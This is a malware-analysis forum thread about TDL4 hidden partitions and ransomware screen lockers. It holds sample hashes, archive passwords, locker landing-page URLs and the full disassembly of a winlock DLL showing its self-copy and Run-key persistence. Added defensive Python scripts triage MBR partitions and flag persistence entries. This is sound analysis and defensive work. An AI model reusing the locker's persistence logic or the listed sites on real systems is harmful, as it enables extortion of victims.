A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #16222  by Cody Johnston
 Tue Oct 23, 2012 2:10 am
@Quads -

The hidden partition is part of the SST rootkit. These 2 infections are commonly seen together. I believe I mentioned it in a blog post a while back.
 #16223  by thisisu
 Tue Oct 23, 2012 2:41 am
Remember that the hidden partition (the one related to TDL4) isn't going to be over 11MB.

The one you listed is 11 GB

In your case, it's Toshiba's recovery partition.
 #16224  by Quads
 Tue Oct 23, 2012 2:50 am
TeamRocketOps

I know what partition type 17 normally means, as I have fixed machines in the past with this (sometimes with more than one of these to remove), but with the 2 machines I have, it turns out, as I start and continue to investigate more, that Toshiba machines do have one of these types of partitions (type 17) ranging from 10 to 15 GB in size, which is why I stopped with those 2 machines: the GB size is very large for SST.

Compared to the SST partitions I have dealt with, between 2 MB and 15 MB, much smaller than GB sizes.

Quads
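The exchange above comes down to one triage rule: a hidden partition type is only interesting in the SST/TDL4 context when it is a few MB, while a multi-GB hidden partition is almost always a vendor recovery volume. The script below is an added example, not code from any poster or from the forum, that parses a raw 512-byte MBR and applies that rule. It assumes the thread's "type 17" is hex 0x17 (hidden NTFS/HPFS) and uses a 16 MiB cut-off; the MBR bytes it runs on are constructed inline, not taken from a real disk.

```python
import struct

SECTOR_SIZE = 512
TABLE_OFFSET = 446                       # partition table starts here in a 512-byte MBR
ENTRY_FMT = "<B3sB3sII"                  # status, CHS start, type, CHS end, LBA start, sector count
ENTRY_SIZE = struct.calcsize(ENTRY_FMT)  # 16 bytes

# Assumption: the thread's "type 17" is read as hex 0x17 (hidden NTFS/HPFS); the other
# values are the usual "hidden" variants of the FAT partition types.
HIDDEN_TYPES = {0x11, 0x14, 0x16, 0x17, 0x1B, 0x1C, 0x1E}
# Posters above report SST/TDL4 hidden partitions of 2-15 MB: anything hidden and under
# 16 MiB deserves a closer look, a multi-GB hidden partition usually does not.
SMALL_LIMIT = 16 * 1024 * 1024


def parse_mbr(mbr):
    """Return the in-use primary partition entries of a raw 512-byte MBR."""
    if len(mbr) < SECTOR_SIZE or mbr[510:512] != b"\x55\xaa":
        raise ValueError("not an MBR: missing 0x55AA signature")
    parts = []
    for slot in range(4):
        status, _chs0, ptype, _chs1, lba, count = struct.unpack_from(
            ENTRY_FMT, mbr, TABLE_OFFSET + slot * ENTRY_SIZE)
        if ptype == 0:            # empty slot
            continue
        parts.append({
            "slot": slot,
            "bootable": status == 0x80,
            "type": ptype,
            "lba_start": lba,
            "sectors": count,
            "size": count * SECTOR_SIZE,
        })
    return parts


def classify(part):
    """Label one partition entry with the thread's rule of thumb."""
    if part["type"] not in HIDDEN_TYPES:
        return "normal"
    if part["size"] <= SMALL_LIMIT:
        return "suspect: small hidden partition (SST/TDL4 size range)"
    return "large hidden partition: probably vendor recovery, verify before deleting"


def triage(mbr):
    """(slot, type, size in MiB, verdict) for every used entry."""
    return [(p["slot"], hex(p["type"]), p["size"] // (1024 * 1024), classify(p))
            for p in parse_mbr(mbr)]


def _entry(status, ptype, lba, count):
    # CHS fields carry the 0xFE 0xFF 0xFF "use LBA" marker.
    return struct.pack(ENTRY_FMT, status, b"\xfe\xff\xff", ptype, b"\xfe\xff\xff", lba, count)


def sample_mbr():
    """Constructed MBR (not from a real disk): an active NTFS volume, a 12 GiB hidden
    recovery-style partition and an 8 MiB hidden partition at the end of the disk."""
    table = (_entry(0x80, 0x07, 2048, 204800)            # 100 MiB NTFS, active
             + _entry(0x00, 0x17, 206848, 25165824)       # 12 GiB, hidden NTFS
             + _entry(0x00, 0x17, 25372672, 16384)        # 8 MiB, hidden NTFS
             + b"\x00" * ENTRY_SIZE)                      # slot 4 unused
    return b"\x00" * TABLE_OFFSET + table + b"\x55\xaa"


if __name__ == "__main__":
    for slot, ptype, mib, verdict in triage(sample_mbr()):
        print(f"slot {slot}: type {ptype}, {mib} MiB -> {verdict}")
```

On a real system feed it the first sector of the physical disk (for instance `dd if=/dev/sda bs=512 count=1` from a boot CD, or sector 0 of a forensic image); a bootkit that also hooks the disk driver may hide its entry from the running OS, so read from offline media when the result matters.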
 #17083  by EP_X0FF
 Sun Dec 09, 2012 12:13 pm
Split.

AutoIt Ransomware moved to Trojan:AutoIt/LockScreen
Reveton related posts moved to Trojan:Win32/Reveton
Tobfy and clones moved to Trojan:Win32/Tobfy
Weelsof related posts moved to Trojan:Win32/Weelsof

Several dumb/off-topic posts have been removed.

Note: something from the above lockers may be missed; content will be moved with time.

Note2: When you attach a sample here, please add a hash or a VT/any other scanner link. This can be useful for search.
 #17208  by EP_X0FF
 Sun Dec 16, 2012 2:27 am
hx1997 wrote:
MD5: 42F2AFB3F6EBAB257415A0539A80E6FA
C:\WINDOWS\system32\rundll32.exe C:\Users\GATEWA~1\wgsdgsdgdsgsd.exe,exp

Different. Also uses a full-screen embedded IE window and creates a new desktop, Desk_Two, and switches to it.

A slightly longer description can be found here: http://www.microsoft.com/security/porta ... kScreen.CO

Pages:

geoldremover.org/?d31437d5bc1ac6cdce4821a8c2c81438
shouldersurfingwaiting.pro/?d31437d5bc1ac6cdce4821a8c2c81438

Smallest winlock, decrypted actual size ~4.5 KB :)
.text:10001000 ; BOOL __stdcall DllEntryPoint(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
.text:10001000                 public DllEntryPoint
.text:10001000 DllEntryPoint   proc near
.text:10001000
.text:10001000 var_8           = dword ptr -8
.text:10001000 hinstDLL        = dword ptr  4
.text:10001000 fdwReason       = dword ptr  8
.text:10001000 lpReserved      = dword ptr  0Ch
.text:10001000
.text:10001000                 push    ebx
.text:10001001                 xor     ebx, ebx
.text:10001003                 dec     [esp+4+fdwReason]
.text:10001007                 jnz     jz_AlreadyRunning
.text:1000100D                 mov     eax, [esp+4+hinstDLL]
.text:10001011                 mov     hModule, eax
.text:10001016                 push    MAX_PATH        ; nSize
.text:1000101B                 push    offset ExistingFileName ; lpFilename
.text:10001020                 push    ebx             ; hModule
.text:10001021                 call    ds:GetModuleFileNameA
.text:10001027                 push    5Ch
.text:10001029                 push    ebx
.text:1000102A                 push    offset ExistingFileName
.text:1000102F                 call    ds:StrRChrA
.text:10001035                 inc     eax
.text:10001036                 push    offset String2  ; "iexplore.exe"
.text:1000103B                 push    eax             ; lpString1
.text:1000103C                 call    ds:lstrcmpiA
.text:10001042                 or      eax, eax
.text:10001044                 jnz     short jnz_NotIE
.text:10001046                 push    offset Name     ; "dllDesk_mutex"
.text:1000104B                 push    ebx             ; bInitialOwner
.text:1000104C                 push    ebx             ; lpMutexAttributes
.text:1000104D                 call    ds:CreateMutexA
.text:10001053                 test    eax, eax
.text:10001055                 jz      jz_AlreadyRunning
.text:1000105B                 call    ds:GetLastError
.text:10001061                 cmp     eax, ERROR_ALREADY_EXISTS
.text:10001066                 jz      jz_AlreadyRunning
.text:1000106C                 push    offset ThreadId ; lpThreadId
.text:10001071                 push    ebx             ; dwCreationFlags
.text:10001072                 push    ebx             ; lpParameter
.text:10001073                 push    offset IEWndProc ; lpStartAddress
.text:10001078                 push    ebx             ; dwStackSize
.text:10001079                 push    ebx             ; lpThreadAttributes
.text:1000107A                 call    ds:CreateThread
.text:10001080
.text:10001080 jnz_NotIE:                              
.text:10001080                 push    offset aRundll32_exe ; "rundll32.exe \""
.text:10001085                 push    offset Data     ; lpString1
.text:1000108A                 call    ds:lstrcpyA
.text:10001090                 push    offset CurrentFileName ; pszPath
.text:10001095                 push    ebx             ; dwFlags
.text:10001096                 push    ebx             ; hToken
.text:10001097                 push    CSIDL_APPDATA   ; csidl
.text:10001099                 push    ebx             ; hwnd
.text:1000109A                 call    ds:SHGetFolderPathA
.text:100010A0                 push    offset aDllexp_dll ; "\\dllexp.dll"
.text:100010A5                 push    offset CurrentFileName ; lpString1
.text:100010AA                 call    ds:lstrcatA
.text:100010B0                 push    MAX_PATH        ; nSize
.text:100010B5                 push    offset ExistingFileName ; lpFilename
.text:100010BA                 push    hModule         ; hModule
.text:100010C0                 call    ds:GetModuleFileNameA
.text:100010C6                 push    offset CurrentFileName ; lpString2
.text:100010CB                 push    offset ExistingFileName ; lpString1
.text:100010D0                 call    ds:lstrcmpiA
.text:100010D6                 or      eax, eax
.text:100010D8                 jz      short jz_AlreadyRunning
.text:100010DA                 push    ebx             ; bFailIfExists
.text:100010DB                 push    offset CurrentFileName ; lpNewFileName
.text:100010E0                 push    offset ExistingFileName ; lpExistingFileName
.text:100010E5                 call    ds:CopyFileA
.text:100010EB                 push    offset aExp_0   ; "\",exp"
.text:100010F0                 push    offset CurrentFileName ; lpString1
.text:100010F5                 call    ds:lstrcatA
.text:100010FB                 push    eax             ; hKey
.text:100010FC                 push    esp             ; phkResult
.text:100010FD                 push    KEY_SET_VALUE   ; samDesired
.text:100010FF                 push    ebx             ; ulOptions
.text:10001100                 push    offset SubKey   ; "Software\\Microsoft\\Windows\\CurrentVersi"...
.text:10001105                 push    HKEY_CURRENT_USER ; hKey
.text:1000110A                 call    ds:RegOpenKeyExA
.text:10001110                 push    offset Data     ; lpString
.text:10001115                 call    ds:lstrlenA
.text:1000111B                 mov     edx, [esp+8+var_8]
.text:1000111E                 push    eax             ; cbData
.text:1000111F                 push    offset Data     ; lpData
.text:10001124                 push    REG_SZ          ; dwType
.text:10001126                 push    ebx             ; Reserved
.text:10001127                 push    offset ValueName ; "dllexp"
.text:1000112C                 push    edx             ; hKey
.text:1000112D                 call    ds:RegSetValueExA
.text:10001133                 call    ds:RegCloseKey
.text:10001139                 push    ebx             ; nShowCmd
.text:1000113A                 push    ebx             ; lpDirectory
.text:1000113B                 push    offset Parameters ; lpParameters
.text:10001140                 push    offset File     ; "rundll32.exe"
.text:10001145                 push    ebx             ; lpOperation
.text:10001146                 push    ebx             ; hwnd
.text:10001147                 call    ds:ShellExecuteA
.text:1000114D
.text:1000114D jz_AlreadyRunning:                     
.text:1000114D                                         
.text:1000114D                 mov     al, 1
.text:1000114F                 pop     ebx
.text:10001150                 retn    0Ch
.text:10001150 DllEntryPoint   endp
Attachments: background.jpg; sample archive (pass: malware)
 #17444  by rough_spear
 Sat Dec 29, 2012 1:47 pm
Hi All, :D
Bunch of Trojan-Ransom total 22 files.

List of MD5
8A86B858C947DD68703E9205B280CC01
0AE5E24F55D77C691BA2152A0A56BCA5
B69F073DCAA8AE557A51D4013FF2E014
96BC48F3B61FFA3D99F2F5E83DE69AF5
6A732D670FF5B0FC0F5D220F0E8FB332
0ED380A2D110DDAB791763F63DBF9B66
FD6F13AB6A110713A620AD78BD97779F
AA7674ED78532F4A434C3F8E6F116F6B
C78B5917D231E674591C78CDCB1C5677
4CF4021F10A8799436FFC408E8CA9A13
A77EA3A7FD51AC8D13B3D946538F1977
68758279D5A09478BC9873556733201E
1CD80132358BF2EE362119DC1E44C5B5
54A54EE7C9056ECE0641D74E45572D00
6A01B49335E7687AA0C1A9E13B40268D
D96592A4E5533FC7D918046ADA5A158D
AD8CEB22E4022D6B3F14EAFE1D3D492F
2AAB2AAFA10A1B84202BF99BB359F5CA
9C77EA86FF0A091BC5517D927FB35FBC
1E933774035F7B2FB191D8FD6083A7F8
E4C241BCA037868D75BD11C841623C35
72B9E8BFAAF4B255A7E6257DD5AB38C2

Regards,

rough_spear. ;)
Attachments: sample archive (password: infected)
 #17764  by Cody Johnston
 Sat Jan 19, 2013 11:40 pm
This one I thought I had to fix exe associations to get tools to run, but found that this one is sneakier than that. MS calls this one 'Lyposit'.

Places exe in %allusersprofile%\Application Data\<random.exe>

Makes reg key:
HKCU\Software\Microsoft\Command Processor
Autorun = <image path to malware>

Also has a funny string in the MUI cache:

[image]

VT: 25/44
https://www.virustotal.com/file/bf4d14f ... /analysis/

This one is the ICC screenlocker, same as in the past; looks like the file is from about 3 weeks ago.

[image]

MD5: 76ac324df35bf1dbfea30c629f63d19c
Attachments: sample archive (password: infected)
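Two persistence mechanisms appear in this thread: the winlock disassembly in EP_X0FF's post copies itself to %APPDATA%\dllexp.dll and writes a HKCU Run value of the form `rundll32.exe "<path>",exp` (hx1997's command line is the same pattern), and the Lyposit sample in the post above sets HKCU\Software\Microsoft\Command Processor\AutoRun, which cmd.exe executes on every start, so the locker returns whenever a console tool is launched even though the exe associations are intact. The script below is an added example, not code from any poster, that triages exported registry values for both patterns. The entries it runs on are constructed (the user name "bob", the value names "VendorTray" and "update", and the file jkhgfd.exe are made up); the Run value and the command lines mirror what the posts show.

```python
import re

# rundll32 invocations: optional full path, then "<module>,<export>"
RUNDLL_RE = re.compile(
    r'^\s*"?(?:[a-z]:\\[^"]*\\)?rundll32(?:\.exe)?"?\s+"?(?P<mod>[^",]+?)"?\s*,\s*(?P<export>[#\w]+)',
    re.I)
# Profile and data directories a standard user can write to (XP and Vista+ layouts)
USER_WRITABLE_RE = re.compile(
    r'\\(?:users|documents and settings|appdata|programdata|application data|temp)\\', re.I)
IMAGE_RE = re.compile(r'^\s*"?([a-z]:\\[^"]+?\.(?:exe|dll|scr|com|bat|cmd))"?', re.I)


def analyze(key, name, data):
    """Return (severity, reason) findings for one registry value."""
    findings = []
    k = key.lower()
    if k.endswith(r"\command processor") and name.lower() == "autorun" and data.strip():
        # cmd.exe runs this value every time it starts; a clean box has no such value,
        # so any content here is worth a look regardless of the path it points to.
        findings.append(("high", "cmd.exe AutoRun hook"))
    m = RUNDLL_RE.match(data)
    if m:
        mod, export = m.group("mod"), m.group("export")
        if USER_WRITABLE_RE.search(mod):
            findings.append(("high", f"rundll32 loads {mod}!{export} from a user-writable path"))
        if not mod.lower().endswith(".dll"):
            # hx1997's sample is an .exe loaded as a DLL through rundll32
            findings.append(("medium", f"rundll32 module has a non-.dll extension: {mod}"))
    elif k.endswith(r"\run") or k.endswith(r"\runonce"):
        im = IMAGE_RE.match(data)
        if im and USER_WRITABLE_RE.search(im.group(1)):
            findings.append(("medium", "Run entry image lives under a user-writable path"))
    return findings


def triage(entries):
    """entries: iterable of (key, value name, value data) as exported from the registry."""
    out = []
    for key, name, data in entries:
        for severity, reason in analyze(key, name, data):
            out.append({"key": key, "name": name, "severity": severity,
                        "reason": reason, "data": data})
    return out


# Constructed sample, not exported from a real machine.
RUN = r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run"
CMDPROC = r"HKCU\Software\Microsoft\Command Processor"
SAMPLE_ENTRIES = [
    (RUN, "VendorTray", r'"C:\Program Files\Vendor\tray.exe" /silent'),          # benign
    (RUN, "update", r"C:\WINDOWS\system32\rundll32.exe C:\Users\GATEWA~1\wgsdgsdgdsgsd.exe,exp"),
    (RUN, "dllexp", r'rundll32.exe "C:\Users\bob\AppData\Roaming\dllexp.dll",exp'),
    (CMDPROC, "AutoRun", r"C:\Documents and Settings\All Users\Application Data\jkhgfd.exe"),
    (CMDPROC, "CompletionChar", "9"),                                            # benign
]

if __name__ == "__main__":
    for f in triage(SAMPLE_ENTRIES):
        print(f'{f["severity"]:6} {f["name"]:12} {f["reason"]}')
```

When cleaning a Lyposit-style infection, delete the AutoRun value (or start cmd.exe with `/d`, which skips AutoRun) before running any console-based tools from that user account, since the hook is the reason those tools appeared not to run.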